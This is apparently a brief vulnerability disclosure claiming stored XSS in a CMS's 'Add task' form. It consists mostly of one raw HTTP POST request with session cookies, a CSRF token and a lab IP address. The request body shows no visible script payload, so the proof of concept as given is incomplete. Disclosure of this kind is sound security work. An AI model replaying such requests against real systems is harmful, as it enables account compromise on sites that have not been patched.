Background system management menu management task management Add task storage xss

[nolan124]

Background system management menu management task management Add task storage xss poc ` POST /TaskInfo/AddOrModify/ HTTP/1.1 Host: 192.168.3.129:10027 Content-Length: 492 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 X-CSRF-TOKEN-yilezhu: CfDJ8HxjCh0oOylDk40Utlg0kuWBxlKFsqJMIO6OrR9nVIOlYrgbNTQzRZv4j8uuaLyAwPdDulYUNWuN9TEj7aixjI5W781nREbA7lmP4O88Voaq-CypCfomdsN9_-KqL0MrC9-MhY5UBGEEiBYD6UK-CRI97guDYTrf-i-nW2f1IaVr02oOPkVgoTvz06vbhkM_XQ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.3.129:10027 Referer: http://192.168.3.129:10027/TaskInfo/AddOrModify/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs_j-o0joMSDe7mdS_3rTvyQ5errD_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E_1-zYB117H7tFTA_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz Connection: close

AntiforgeryKey_yilezhu=CfDJ8HxjCh0oOylDk40Utlg0kuWBxlKFsqJMIO6OrR9nVIOlYrgbNTQzRZv4j8uuaLyAwPdDulYUNWuN9TEj7aixjI5W781nREbA7lmP4O88Voaq-CypCfomdsN9_-KqL0MrC9-MhY5UBGEEiBYD6UK-CRI97guDYTrf-i-nW2f1IaVr02oOPkVgoTvz06vbhkM_XQ&Id=5&Name=LogTestJob&Group=TestGroup&Assembly=E%3A%5Cworkspace%5Cvs2017%5CCzar.Cms%5Csrc%5CCzar.Cms.Admin%5Cbin%5CDebug%5Cnetcoreapp2.2%5CCzar.Cms.Job.dll&ClassName=Czar.Cms.Job.LogTestJob&Cron=%2F5++++*+%3F&Description=%E6%B5%8B%E8%AF%95Log ` then you can view in bankground http://192.168.3.129:10027/TaskInfo/LoadData/?page=1&limit=10